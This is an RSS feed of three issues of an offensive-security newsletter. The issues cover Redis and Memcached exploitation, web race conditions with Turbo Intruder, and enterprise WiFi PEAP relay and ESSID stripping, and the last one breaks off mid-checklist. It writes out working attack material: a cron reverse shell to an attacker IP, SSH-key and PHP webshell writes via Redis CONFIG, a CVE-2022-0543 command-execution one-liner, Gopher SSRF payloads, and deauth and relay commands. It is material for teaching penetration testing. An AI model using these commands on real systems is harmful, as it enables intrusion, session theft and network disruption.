<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Kayssel - Offensive Security Blog</title><description>Offensive Security Documentation by Ruben Santos Garcia</description><link>https://www.kayssel.com/</link><language>en-us</language><item><title>Redis and Memcached: When Cache Becomes a Foothold</title><link>https://www.kayssel.com/newsletter/issue-41</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-41</guid><description>Unauthenticated access, file-write RCE, module loading, SSRF via Gopher, CVE-2022-0543 Lua sandbox escape, and Memcached data extraction</description><pubDate>Sun, 15 Mar 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Last week we covered race conditions and the single-packet attack. This week we go back to infrastructure.

Redis and Memcached are the default caching layer in most modern web stacks. Both run without authentication by default, exposed to the internal network under the assumption that the perimeter provides protection. That assumption fails constantly: misconfigured Docker containers, cloud security groups with overly permissive rules, and SSRF vulnerabilities that reach internal services. When you land inside a network or find an SSRF pointing inward, these services escalate from cache to shell in minutes.

This week: unauthenticated access, file-write RCE, module loading, SSRF via Gopher, Lua sandbox escape, and Memcached data extraction.

Let&apos;s get into it 👇

## 🔍 Recon: Finding the Attack Surface

Default Redis port: **6379/TCP**. Default Memcached port: **11211/TCP and UDP**.

```bash
# Nmap service detection
nmap -sV -p 6379,11211 -T4 &lt;target&gt;

# Quick Redis auth check
redis-cli -h &lt;target&gt; -p 6379 ping

# Memcached version and stats
echo &quot;version&quot; | nc -q1 &lt;target&gt; 11211
echo &quot;stats&quot; | nc -q1 &lt;target&gt; 11211
```

A `PONG` from Redis with no `AUTH` challenge means unauthenticated access. From there you&apos;ve got full read/write on the database and access to the `CONFIG` command. That combination is all you need.

[Redis Protected Mode](https://redis.io/docs/latest/operate/oss_and_stack/management/security/) was introduced in Redis 3.2.0: when active, an instance with no password configured only accepts connections from loopback. The problem is that the protection is switched off the moment someone adds `bind 0.0.0.0` to the config, which is standard practice in containerized and cloud deployments where services need to talk across subnets.

## 💀 Unauthenticated Access: What You Can Do

Once you&apos;ve confirmed unauthenticated access, start with recon.

```bash
# Check Redis version and configuration
redis-cli -h &lt;target&gt; INFO server | grep redis_version
redis-cli -h &lt;target&gt; CONFIG GET dir
redis-cli -h &lt;target&gt; CONFIG GET dbfilename

# Dump all keys
redis-cli -h &lt;target&gt; KEYS &quot;*&quot;

# Read values (replace &quot;session:user123&quot; with real key)
redis-cli -h &lt;target&gt; GET &quot;session:user123&quot;

# Check all databases
redis-cli -h &lt;target&gt; INFO keyspace
```

Session tokens, API keys, OAuth tokens, internal application state. Cached data is rarely encrypted. If the application stores sessions in Redis, you can pull active session tokens and authenticate as any user without a password.

The `CONFIG` command is where things escalate. It lets you change Redis&apos;s working directory and dump file name at runtime. The database then gets written to that location on disk on the next `SAVE`.
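Understanding what `redis-cli` puts on the wire pays off here: Redis speaks RESP, a trivially simple plaintext protocol. A minimal sketch of the encoding (the function name is mine, not a library API; it assumes ASCII arguments):

```python
def resp_encode(*args):
    """Encode one command as a RESP array of bulk strings,
    the exact bytes redis-cli sends for each command."""
    out = f"*{len(args)}\r\n"
    for arg in args:
        # real clients use byte lengths; identical for ASCII args
        out += f"${len(arg)}\r\n{arg}\r\n"
    return out.encode()

# What CONFIG SET dir /tmp looks like on the wire
print(resp_encode("CONFIG", "SET", "dir", "/tmp"))
```

The same framing shows up again in the Gopher SSRF payloads: they are just percent-encoded RESP.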

## 🔑 RCE via File Write

This is the classic Redis RCE technique. You repoint Redis&apos;s dump file at a location you control, write a malicious payload into a key, and force a save. Redis writes the entire database to disk, embedding your payload in the dump file.

**Technique 1: SSH authorized_keys**

Requires Redis running as a user with a home directory and SSH enabled.

```bash
redis-cli -h &lt;target&gt; CONFIG SET dir /root/.ssh
redis-cli -h &lt;target&gt; CONFIG SET dbfilename authorized_keys
redis-cli -h &lt;target&gt; SET pwned &quot;\n\nssh-rsa AAAA...your-public-key...\n\n&quot;
redis-cli -h &lt;target&gt; SAVE
```

The dump file contains binary Redis headers around your key. SSH ignores malformed lines and will find and accept the valid public key entry. Then:

```bash
ssh -i ~/.ssh/id_rsa root@&lt;target&gt;
```

**Technique 2: Cron job**

Requires Redis running as root, or knowledge of the cron directory path.

```bash
redis-cli -h &lt;target&gt; CONFIG SET dir /etc/cron.d
redis-cli -h &lt;target&gt; CONFIG SET dbfilename redis-shell
redis-cli -h &lt;target&gt; SET payload &quot;\n\n* * * * * root bash -i &gt;&amp; /dev/tcp/&lt;attacker-ip&gt;/4444 0&gt;&amp;1\n\n&quot;
redis-cli -h &lt;target&gt; SAVE
```

Start a listener and wait for the cron job to fire. It runs as root if Redis runs as root, which is common in poorly configured deployments.

**Technique 3: Webshell**

If you know the web root path, write a webshell directly.

```bash
redis-cli -h &lt;target&gt; CONFIG SET dir /var/www/html
redis-cli -h &lt;target&gt; CONFIG SET dbfilename shell.php
redis-cli -h &lt;target&gt; SET shell &quot;&lt;?php system(\$_GET[&apos;cmd&apos;]); ?&gt;&quot;
redis-cli -h &lt;target&gt; SAVE
```

The Redis binary dump format wraps your payload in headers, but PHP will skip to the first valid `&lt;?php` tag and execute from there.
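All three file-write techniques rely on the same property: the dump embeds string values verbatim, and the target parser (sshd, cron, PHP) tolerates the binary noise around them. A toy illustration of why the `\n\n` padding matters; the framing bytes here are fabricated stand-ins, not the real RDB format:

```python
# Fabricated stand-in for RDB framing; only the padding behavior is the point
payload = b"\n\nssh-rsa AAAA...key... attacker@kali\n\n"
dump = b"REDIS0009\xfa\x05junk" + payload + b"\xff\x00binary-footer"

# A line-oriented parser (sshd reading authorized_keys, crond reading a
# cron file) splits on newlines and discards lines it cannot parse.
lines = dump.split(b"\n")
valid = [line for line in lines if line.startswith(b"ssh-rsa ")]
print(valid)  # the key survives on its own clean line
```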

## ⚙️ Module Loading RCE (Redis 4.x and 5.x)

Redis 4.x introduced the [`MODULE LOAD`](https://redis.io/docs/latest/commands/module-load/) command. It loads a shared object (`.so` file) as a Redis module, extending the server with new commands. Attackers abused master-slave replication to push a malicious module to the target.

[redis-rogue-server](https://github.com/n0b0dyCN/redis-rogue-server) automates the full chain.

**The attack works in four steps:**

1. Your machine acts as a rogue Redis master.
2. You tell the target Redis to `SLAVEOF` your machine.
3. The target connects for replication. You respond with `FULLRESYNC` and transfer a malicious `.so` file.
4. You issue `MODULE LOAD /path/to/exp.so` on the target. It executes with Redis process privileges.

```bash
# Attacker machine
python redis-rogue-server.py \
  --rhost &lt;target-ip&gt; \
  --rport 6379 \
  --lhost &lt;attacker-ip&gt; \
  --lport 21000 \
  --exp exp.so
```

The implicit trust in the master-slave replication protocol is the root cause. A slave accepts file synchronization and commands from whatever it&apos;s told is its master. There&apos;s no certificate verification or challenge-response.
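The handshake a rogue master must answer is short, which is why tools automate it so reliably. A hedged sketch of the response logic, simplified from what redis-rogue-server does (`FAKE_MODULE` is a placeholder, not a compiled `exp.so`):

```python
FAKE_MODULE = b"\x00" * 16  # placeholder for the malicious shared object bytes

def rogue_master_reply(line: bytes) -> bytes:
    """Map each command a connecting replica sends to the reply that
    keeps the handshake moving toward the payload transfer."""
    if line.startswith(b"PING"):
        return b"+PONG\r\n"
    if line.startswith(b"REPLCONF"):
        return b"+OK\r\n"  # accept port and capability announcements
    if line.startswith(b"PSYNC") or line.startswith(b"SYNC"):
        # Announce a full resync, then ship the payload where the RDB
        # snapshot belongs; the target writes it to dbfilename on disk.
        header = b"+FULLRESYNC " + b"Z" * 40 + b" 0\r\n"
        return header + b"$" + str(len(FAKE_MODULE)).encode() + b"\r\n" + FAKE_MODULE
    return b"-ERR unhandled\r\n"
```

After the transfer, `MODULE LOAD` turns the written file into code execution, and `SLAVEOF NO ONE` detaches the target again.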

**Affected versions:** Redis 4.x and 5.x. Redis 6.0+ introduced ACLs that restrict `MODULE LOAD` to explicit `@admin` users, and Redis 7.0 disabled module loading by default. If you&apos;re testing a containerized environment running Redis 4 or 5 because &quot;it works and we haven&apos;t updated it,&quot; this technique applies.

## 🌐 SSRF to Redis: Gopher Protocol

SSRF vulnerabilities that can reach internal Redis instances are a critical finding. If you caught [Issue 4 on SSRF](https://www.kayssel.com/newsletter/issue-4/), this is where it gets interesting: `gopher://` protocol support lets you send raw TCP data to any reachable host and port. Redis speaks a plaintext protocol called RESP. You can send arbitrary RESP commands through a Gopher URL.

[Gopherus](https://github.com/tarunkant/Gopherus) generates the payloads automatically.

```bash
# Install and run
git clone https://github.com/tarunkant/Gopherus
python gopherus.py --exploit redis
```

Gopherus asks what you want to do (write SSH key, write webshell, etc.) and outputs a `gopher://` URL. You inject that URL into the SSRF parameter.

```
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0AFLUSHALL%0D%0A...
```

The URL-encoded string is a sequence of RESP commands. The target application fetches it, the HTTP library speaks Gopher, and Redis processes the commands as if they came from a legitimate client.
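Gopherus is the practical choice, but the encoding is simple enough to reproduce by hand: serialize the commands as RESP, then percent-encode everything after the `/_` prefix. A minimal sketch (the function name is mine):

```python
from urllib.parse import quote

def redis_gopher_url(host, port, *commands):
    """Build a gopher:// URL that delivers raw RESP commands.
    Each command is a tuple of args, e.g. ("CONFIG", "SET", "dir", "/tmp")."""
    resp = ""
    for cmd in commands:
        resp += f"*{len(cmd)}\r\n"
        for arg in cmd:
            resp += f"${len(arg)}\r\n{arg}\r\n"
    # "_" is the gopher item-type byte; everything after it hits the socket raw
    return f"gopher://{host}:{port}/_{quote(resp, safe='')}"

print(redis_gopher_url("127.0.0.1", 6379, ("FLUSHALL",)))
```

The output reproduces the `%2A1%0D%0A%248%0D%0AFLUSHALL%0D%0A` sequence from the example URL above.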

**When you&apos;ll see this:** PHP applications with `file_get_contents()` and user-controlled URLs. Java applications using `java.net.URL`. Any SSRF that doesn&apos;t explicitly block `gopher://` in its scheme whitelist. Cloud metadata SSRF endpoints that have lateral reach to internal services.

Check whether the SSRF supports `gopher://` by sending `gopher://127.0.0.1:6379/_PING%0D%0A` and looking for a `+PONG` in the response body or a difference in response behavior.

## 🐛 CVE-2022-0543: Lua Sandbox Escape

[CVE-2022-0543](https://nvd.nist.gov/vuln/detail/CVE-2022-0543) is CVSS 10.0. It&apos;s a Lua sandbox escape that allows arbitrary code execution with Redis process privileges. CISA added it to the Known Exploited Vulnerabilities catalog.

Here&apos;s the catch: this isn&apos;t an upstream Redis vulnerability. It&apos;s a **Debian and Ubuntu packaging issue**. The Debian maintainers packaged the Lua interpreter in a way that exposed the `package` global variable inside the Redis Lua sandbox, which should have been stripped out. Through `package.loadlib()`, you can load arbitrary shared libraries.

**Affected distributions:**
- Debian 9, 10, 11
- Ubuntu 20.04, 21.10

**Affected Redis package versions:**
- `redis ≤ 5.0.14-1+deb10u1` (Debian 10)
- `redis ≤ 6.0.15-1` (various)

**Exploitation:** Requires `EVAL` command access. On an unauthenticated Redis instance this is trivially available.

```bash
# Test if vulnerable (attempt to load libc)
redis-cli -h &lt;target&gt; EVAL &quot;local io_l = package.loadlib(&apos;/usr/lib/x86_64-linux-gnu/libc.so.6&apos;, &apos;luaopen_io&apos;); local io = io_l(); local f = io.popen(&apos;id&apos;, &apos;r&apos;); local res = f:read(&apos;*a&apos;); f:close(); return res&quot; 0
```

If the instance is vulnerable, you&apos;ll get the output of `id` back. That&apos;s unauthenticated RCE with no `CONFIG` access needed, no write permissions, none of the file-write setup. Just `EVAL` and you&apos;re in.

**Fixed in:** Redis 6.0.16-1+deb11u2, 5.0.14-1+deb10u2. If the target is Debian/Ubuntu and running an older Redis package version, check this first.

## 🗄 Memcached: Data Extraction and UDP Amplification

Memcached has no authentication by default. SASL auth exists but requires explicit compilation support and is rarely enabled. If you can reach port 11211, you can read everything in cache.

**Enumeration and extraction:**

```bash
# Get server stats
echo &quot;stats&quot; | nc -q1 &lt;target&gt; 11211

# List all slab IDs
echo &quot;stats items&quot; | nc -q1 &lt;target&gt; 11211

# Dump keys from a slab (replace 1 with actual slab ID, 0 = unlimited)
echo &quot;stats cachedump 1 0&quot; | nc -q1 &lt;target&gt; 11211

# Retrieve a cached item
echo &quot;get &lt;key&gt;&quot; | nc -q1 &lt;target&gt; 11211
```

`stats items` returns the slab IDs and item counts. `stats cachedump &lt;slab&gt; &lt;count&gt;` returns the actual key names. `get &lt;key&gt;` retrieves the value. On most applications this means session tokens, user objects, API responses with PII, and internal application data.
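The enumeration loop is easy to script: pull the slab IDs out of `stats items`, then dump each one. A sketch of the parsing step; the sample lines below are fabricated but follow the real `STAT items:1:number 5` line format:

```python
def parse_slab_ids(stats_items_output):
    """Extract unique slab IDs, in order, from stats items output."""
    slabs = []
    for line in stats_items_output.splitlines():
        parts = line.split(":")
        # Lines look like: STAT items:1:number 5
        if line.startswith("STAT items:") and len(parts) >= 3:
            slab = int(parts[1])
            if slab not in slabs:
                slabs.append(slab)
    return slabs

sample = "STAT items:1:number 5\nSTAT items:1:age 120\nSTAT items:3:number 2\nEND"
print(parse_slab_ids(sample))  # [1, 3]
```

Feed each ID into `stats cachedump &lt;slab&gt; 0`, then `get` every key that comes back.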

**CVE-2018-1000115: UDP Amplification**

[CVE-2018-1000115](https://nvd.nist.gov/vuln/detail/cve-2018-1000115) affects Memcached through 1.5.5. A single small UDP request with a spoofed source IP triggers a response up to 50,000 times larger. Attackers used this in the February 2018 GitHub DDoS attack (1.3 Tbps peak), which was the largest DDoS attack recorded at the time.

**Check if UDP is open:**

```bash
nmap -sU -p 11211 &lt;target&gt;
echo &quot;version&quot; | nc -u -q1 &lt;target&gt; 11211
```

This is a finding worth noting even if direct exploitation isn&apos;t in scope. The fix is upgrading to Memcached 1.5.6+ where UDP is disabled by default, or explicitly disabling it with the `-U 0` flag.

## 🎯 Key Takeaways

Redis with no authentication and `CONFIG` access is a direct path to RCE. File write to SSH keys or cron is reliable when Redis runs as root or a privileged user. Module loading via redis-rogue-server works against Redis 4.x and 5.x where ACLs aren&apos;t enforced. Neither technique requires a CVE.

CVE-2022-0543 changes the calculation for Debian and Ubuntu targets. CVSS 10.0. No `CONFIG` access needed. If the target is running a vulnerable Debian or Ubuntu Redis package, `EVAL` alone gives you code execution.

SSRF vulnerabilities that support `gopher://` and can reach internal Redis or Memcached instances should be rated critical. Gopherus generates ready-to-use payloads. The internal cache layer is rarely hardened against this, because the assumption is that an externally reachable SSRF won&apos;t exist.

Memcached is typically overlooked. No authentication, full key enumeration, and cached session tokens are a consistent finding in any environment where Memcached is exposed on the internal network.

---

**Practice:**

- [HackTricks: Redis RCE](https://hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html) - comprehensive Redis pentesting reference
- [HackTricks: Memcached](https://hacktricks.wiki/en/network-services-pentesting/11211-memcache/index.html) - Memcached enumeration and exploitation
- [Gopherus GitHub](https://github.com/tarunkant/Gopherus) - SSRF payload generator for Redis, Memcached, FastCGI, MySQL, and more
- [redis-rogue-server GitHub](https://github.com/n0b0dyCN/redis-rogue-server) - module loading RCE for Redis 4.x/5.x
- [Redis Security Documentation](https://redis.io/docs/latest/operate/oss_and_stack/management/security/) - official hardening reference
- [CVE-2022-0543 NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2022-0543) - Lua sandbox escape (CVSS 10.0, Debian/Ubuntu)
- [TryHackMe: Redis (Jack)](https://tryhackme.com/room/jackofalltradesjr) - practice Redis exploitation in a lab environment

---

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>infrastructure-security</category><author>Ruben Santos</author></item><item><title>Race Conditions: When Timing Is Everything</title><link>https://www.kayssel.com/newsletter/issue-40</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-40</guid><description>TOCTOU mechanics, limit overrun attacks, multi-endpoint races, and the single-packet technique that makes all of this consistently exploitable</description><pubDate>Sun, 08 Mar 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

After four weeks on WiFi, we&apos;re back to web security.

Race conditions show up constantly in bug bounty programs. The problem has always been reliable exploitation: send two requests 50ms apart and the server processes them sequentially. No race. James Kettle&apos;s 2023 research at PortSwigger changed that by showing how HTTP/2 eliminates network jitter entirely.

If you caught [Issue 11](https://www.kayssel.com/newsletter/issue-11/) on Web3 withdrawals, you saw race conditions mentioned in the context of double-spending. That was the surface. This week we go deep: TOCTOU mechanics, the single-packet attack, limit overrun, and multi-endpoint races.

Let&apos;s break some state machines 👇

## ⏱ The Core Problem: TOCTOU

**Time-Of-Check to Time-Of-Use (TOCTOU)** is the root cause of most web race conditions.

The application checks a condition at one point in time. Then it acts on the result at a later point. Between check and action, the state can change. An attacker who lands requests inside that window can make the application act on a condition that is no longer true.

Classic example: gift card redemption.

```
1. App checks if gift card has been used → status: unused
2. [race window opens]
3. App marks gift card as used
4. App credits balance
```

Send 20 requests simultaneously. All 20 arrive at step 1. All 20 see status: unused. All 20 pass the check and proceed through steps 3 and 4. One gift card becomes 20 credits.

The race window is the gap between check and action. Narrow windows (microseconds, single database transaction split into two queries) are harder to hit but still exploitable with the right tooling. Your job is to identify the window and fill it.
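The window is easy to reproduce locally. A self-contained simulation: a barrier stands in for simultaneous request arrival (a real server needs no such help, because the window is its own check-then-act gap):

```python
import threading

N = 20
card = {"used": False}       # shared state, no locking
credits = []
barrier = threading.Barrier(N)

def redeem():
    if not card["used"]:     # time of check
        barrier.wait()       # every thread passes the check first
        card["used"] = True  # time of use: too late
        credits.append(1)

threads = [threading.Thread(target=redeem) for _ in range(N)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(f"one gift card, {len(credits)} credits")  # 20 credits
```

Making the check and the write a single atomic operation (a lock, or a database transaction with the right isolation level) collapses the window.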

## 🔍 Finding the Race Window

Three signals point to exploitable race conditions.

**Limit enforcement on countable actions.** Gift cards, discount codes, referral bonuses, free trial activations, vote counts. Any operation the application limits per user or per resource. If the limit is checked before the action is recorded, it&apos;s potentially raceable.

**Suspicious error timing.** Errors like &quot;insufficient funds&quot; appearing after a transaction completes suggest the balance check and the deduction are separate operations. That gap is your window.

**State transitions on single-use resources.** Password reset tokens, email verification codes, one-time links. Any resource that transitions from valid to used in two separate steps is a candidate.

**How to test:** Send the same state-changing request twice simultaneously. Different response codes or bodies between two identical requests indicate state-dependent behavior worth investigating.

## ⚡ The Single-Packet Attack

The problem with race conditions has always been network jitter. Requests sent milliseconds apart arrive milliseconds apart. The server processes them sequentially. No race.

James Kettle&apos;s 2023 paper [&quot;Smashing the state machine&quot;](https://portswigger.net/research/smashing-the-state-machine) introduced the single-packet attack. [HTTP/2 (RFC 9113)](https://datatracker.ietf.org/doc/html/rfc9113) multiplexes multiple requests over a single TCP connection. A client can send multiple complete HTTP/2 requests in one TCP packet. The server receives all of them before processing any.

**Network jitter eliminated. Completely.**

For HTTP/1.1 targets, the technique is **last-byte synchronization**. Send all requests with everything except the final byte. Hold the last bytes. Flush them all simultaneously. Requests complete at near-identical times without HTTP/2 support.

Burp Suite&apos;s Turbo Intruder handles both automatically.

## 💀 Attack 1: Limit Overrun

Limit overrun is the most common race condition in bug bounty. You exceed a per-user limit by sending requests faster than the application can enforce it.

**Scenario:** A platform allows one redemption per promo code. Endpoint: `POST /api/promo/redeem`.

**Step 1:** Confirm the endpoint works. Redeem once manually, verify the discount applies.

**Step 2:** Reset state (fresh account or fresh code) and launch the race.

**Turbo Intruder script for single-packet attack (HTTP/2 targets):**

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    for i in range(20):
        engine.queue(target.req, gate=&apos;race1&apos;)

    engine.openGate(&apos;race1&apos;)

def handleResponse(req, interesting):
    table.add(req)
```

The `gate` parameter holds all 20 requests until `openGate` fires. All 20 release in a single HTTP/2 packet. The server receives them simultaneously before processing any of them.

**What success looks like:**
- Multiple `200 OK` responses where you expected only one
- Different response bodies across simultaneous requests (state inconsistency)
- One success followed by &quot;already redeemed&quot; errors, but the credit appears multiple times

## 🔀 Attack 2: Multi-Endpoint Race

Harder to find, higher impact. Two different endpoints share state. The check happens on one. The action happens on another.

**Scenario:** An e-commerce checkout flow.

```
POST /api/cart/checkout   → validates cart, processes payment
POST /api/cart/add-item   → adds an item to the cart
```

After initiating checkout (state: under review), add an item to the cart before the checkout finalizes. If the checkout reads cart contents once and the add-item endpoint doesn&apos;t validate checkout state, you get an item added post-validation.

```
T=0ms   POST /api/cart/checkout   (payment submitted, state: processing)
T=0ms   POST /api/cart/add-item   (item added simultaneously)
```

Some applications finalize the order and update the cart in separate database transactions. Land your request in that gap and the item ships without payment.

**How to map this:** Look for shared identifiers across endpoints (cart ID, session, order ID). Any endpoint that reads a shared resource without locking it is a candidate for this attack. Checkout flows, balance transfers, inventory reservations, and multi-step form submissions are all worth testing.

## 🛠 Turbo Intruder

[Turbo Intruder](https://github.com/PortSwigger/turbo-intruder) is the standard tool for web race conditions. Install it from the [BApp Store](https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988).

**For HTTP/1.1 targets (last-byte sync):**

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=20,
                           engine=Engine.THREADED,
                           lastByte=True)

    for i in range(20):
        engine.queue(target.req, gate=&apos;race1&apos;)

    engine.openGate(&apos;race1&apos;)

def handleResponse(req, interesting):
    table.add(req)
```

`lastByte=True` holds the final byte of each request in the send buffer. `openGate` flushes them simultaneously. Less precise than the HTTP/2 single-packet approach, but effective when the server doesn&apos;t support HTTP/2.

**Choosing the right engine:**
- HTTP/2 target: `Engine.BURP2` with `concurrentConnections=1` and gate
- HTTP/1.1 target: `Engine.THREADED` with `lastByte=True` and gate
- When unsure: try BURP2 first, fall back to THREADED

## 🎯 Key Takeaways

Race conditions are consistently underreported because reliable exploitation used to require perfect network conditions. The single-packet attack removes that constraint. If the target speaks HTTP/2, you can send 20 simultaneous requests in one TCP packet and the network is no longer a factor.

Limit overrun is where you start on any new target. Any endpoint that enforces a per-user limit by checking a database field before writing the result is worth testing. Gift cards, promo codes, referral bonuses, vote buttons, free trial activations.

Multi-endpoint races require mapping the application&apos;s state machine. Find endpoints that share state without locking. The check happens on one endpoint. The action happens on another. Checkout flows and balance transfers are the highest-value targets.

Turbo Intruder handles both attack patterns. Gate mechanism for simultaneous release. `Engine.BURP2` for HTTP/2. `Engine.THREADED` with `lastByte=True` for HTTP/1.1.

---

**Practice:**

- [PortSwigger Academy: Race Conditions](https://portswigger.net/web-security/race-conditions) - four labs covering limit overrun, multi-endpoint, single-endpoint partial construction, and connection warming
- James Kettle&apos;s full paper: [&quot;Smashing the state machine&quot;](https://portswigger.net/research/smashing-the-state-machine) - required reading before your next engagement

---

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: Wrapping Up the Series (Part 4)</title><link>https://www.kayssel.com/newsletter/issue-39</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-39</guid><description>PEAP relay attacks, ESSID stripping for WIDS bypass, and a complete wireless assessment checklist for enterprise engagements</description><pubDate>Sun, 01 Mar 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Last week we covered enterprise WiFi exploitation. The 802.1X architecture. EAP methods and their weaknesses. Credential capture with Evil Twin. Legacy method exploitation (PAP, EAP-MD5). Pass-the-Hash using captured NT hashes directly in wpa_supplicant.

This week we close the series with the two techniques that sit at the top of the enterprise WiFi attack chain: PEAP relay and ESSID stripping. Then a wireless assessment checklist you can use on your next engagement.

Let&apos;s finish strong 👇

## ⚡ PEAP Relay Attack

PEAP relay was introduced in 2018 by Michael Kruger and Dominic White in their paper &quot;Practical attacks against WPA-EAP-PEAP.&quot; It&apos;s categorically different from what we covered last week.

Credential capture attacks (eaphammer, hostapd-wpe) require the victim to connect to your rogue AP and then you crack the NetNTLMv1 hash offline. PEAP relay skips cracking entirely. You forward the victim&apos;s live authentication exchange to the real network. The RADIUS server authenticates it. You get network access.

No hash. No cracking. No password.

**Key constraints:**

- Works with PEAP+MSCHAPv2 only. Not TTLS+MSCHAPv2.
- Requires at least 3 wireless adapters.
- Timing matters. Complex setup.

### Why This Works

The [IEEE 802.1X standard](https://standards.ieee.org/ieee/802.1X/7345/) trusts that EAP frames come from legitimate sources. Without cryptographic binding, there&apos;s nothing tying the authentication session to the physical client that started it. You&apos;re just a frame forwarder. The RADIUS server can&apos;t tell.

The relay depends on `crypto_binding=0` in the PEAP exchange. Crypto binding (specified in Microsoft&apos;s MS-PEAP protocol documentation) links the outer TLS tunnel to the inner MSCHAPv2 session. When disabled, you can relay one without the other. Many enterprise networks still accept `crypto_binding=0` for backwards compatibility with legacy clients.

### Attack Architecture

```
[Victim] ---&gt; [Rogue AP (berate-ap)] ---&gt; [wpa_sycophant] ---&gt; [Legit AP] ---&gt; [RADIUS]
```

Three components, three adapters running simultaneously.

**[berate_ap](https://github.com/sensepost/berate_ap)** (SensePost/Orange Cyberdefense) acts as the rogue AP. It intercepts the victim&apos;s EAP frames and passes them to wpa_sycophant.

**[wpa_sycophant](https://github.com/sensepost/wpa_sycophant)** (SensePost) is a patched wpa_supplicant that relays those frames to the legitimate AP. It connects to the real network on behalf of the victim.

**DoS adapter** forces the victim off the real AP so they reconnect to yours.

### wpa_sycophant Configuration

```
network={
    ssid=&quot;CorporateWiFi&quot;
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity=&quot;&quot;              # Leave blank
    anonymous_identity=&quot;&quot;    # Leave blank
    password=&quot;&quot;              # Leave blank
    eap=PEAP
    phase1=&quot;crypto_binding=0 peapver=0&quot;
    phase2=&quot;auth=MSCHAPV2&quot;
    bssid_blacklist=AA:BB:CC:DD:EE:FF  # MAC of your berate-ap interface
}
```

`bssid_blacklist` is critical. It prevents wpa_sycophant from connecting to your own rogue AP and creating an infinite loop. Set it to the berate-ap MAC.

If `peapver=0` doesn&apos;t work, try `peapver=1`.

### Execution

**Interface 1 (managed mode)** - Rogue AP:

```bash
berate_ap --eap --mana-wpe --wpa-sycophant --no-virt --mana-credout lo wlan0 &apos;CorporateWiFi&apos;
```

**Interface 2 (managed mode)** - Relay:

```bash
wpa_sycophant -c sycophant.conf -i wlan1
```

**Interface 3 (monitor mode)** - Temporary DoS:

```bash
iw dev wlan2 set channel 6
timeout 5 aireplay-ng --deauth 0 -a &lt;legit-ap-bssid&gt; --ignore-negative-one wlan2mon
```

The deauth burst is temporary by design. You only need the victim to look for an AP once. Keep wlan2 available; you may need to repeat the DoS if the victim reconnects to the real AP before wpa_sycophant establishes the relay.

Once wpa_sycophant connects to the real network it should obtain an IP automatically. If not, run `dhclient wlan1` manually.

### What Stops This

**Enforced crypto binding:** If the RADIUS server requires `crypto_binding=1`, the relay fails. The cryptographic binding links the outer TLS tunnel to the inner MSCHAPv2 session. You can&apos;t split them. FreeRADIUS supports this via `crypto_binding = require` in the PEAP module config, but it&apos;s rarely deployed.

**EAP-TLS:** Immune entirely. No passwords are transmitted. Mutual certificate-based auth means you&apos;d need the client&apos;s private key to impersonate it.

## 🎭 ESSID Stripping

Wireless Intrusion Detection Systems (WIDS) flag rogue APs by matching their SSID against a whitelist of known corporate networks. ESSID stripping defeats this by appending a visually invisible character to the SSID, making it a different string while appearing identical to users.

`CorporateWiFi` and `CorporateWiFi ` (trailing space) are different strings. The WIDS sees no match. No alert fires.

**Invisible characters:**

- Space: `\x20`
- Tab: `\x09`
- Zero-width space: `\xE2\x80\x8B` (Unicode U+200B)

A side effect: Apple devices normally group APs with the same SSID under a single network entry, which would reveal your Evil Twin as a suspicious duplicate. ESSID stripping makes the stripped SSID appear as a separate network to Apple clients, eliminating that visual tell.
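The trick is pure string inequality: identical glyphs, different bytes. A quick sketch:

```python
legit = "CorporateWiFi"
variants = [
    legit + "\x20",    # trailing space
    legit + "\x09",    # trailing tab
    legit + "\u200b",  # zero-width space, U+200B
]

for v in variants:
    # A signature-based WIDS doing exact SSID matching gets no hit
    print(repr(v), v == legit, v.encode("utf-8"))
```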

### Using eaphammer

[eaphammer&apos;s](https://github.com/s0lst1c3/eaphammer) `--essid-stripping` flag handles this directly:

```bash
python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid &apos;CorporateWiFi&apos; \
  --creds \
  --negotiate balanced \
  --essid-stripping &apos;\x20&apos;
```

[airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) applies ESSID stripping automatically during Evil Twin attacks by default, without needing a separate flag.

### What It Doesn&apos;t Bypass

Signature-based WIDS: defeated. Behavior-based systems: not affected.

Behavior-based detection monitors for patterns you can&apos;t hide:

- Deauthentication spikes (volume of deauth frames per client or timeframe)
- Certificate anomalies (your cert doesn&apos;t chain to the corporate CA)
- A known BSSID disappearing while a new one appears on the same channel with a nearly identical SSID
- Unusual EAP negotiation patterns

Modern enterprise WIPS platforms combine both detection methods. ESSID stripping buys you cover against the simpler systems. Don&apos;t treat it as a guarantee.

## 📋 Wireless Assessment Checklist

This is what a complete wireless engagement should cover. Use it as your field guide.

&gt; Always confirm scope before starting. Some tests (DoS, network disruption, segmentation, captive portal bypass) require explicit authorization and agreed time windows. Notify stakeholders before running disruptive tests.

### Reconnaissance

- Confirm agreed SSIDs in scope
- Identify AP models, firmware versions, and known CVEs
- Check physical access to APs
- Scan all bands: 2.4GHz, 5GHz, and 6GHz
- Identify all SSIDs in scope, including hidden networks
- Detect DFS channel usage
- Check for existing rogue APs in the RF environment
- Check wireless client isolation settings
- Check if passwords are visible in common areas

### Open and Personal Networks

- Attempt WEP cracking on any WEP networks found
- Capture WPA/WPA2 4-way handshakes and assess passphrase strength
- Capture PMKIDs (clientless) and assess passphrase strength
- Try Evil Twin + captive portal against WPA/WPA2 PSK networks
- Test WPS Pixie Dust, Null PIN, and brute-force
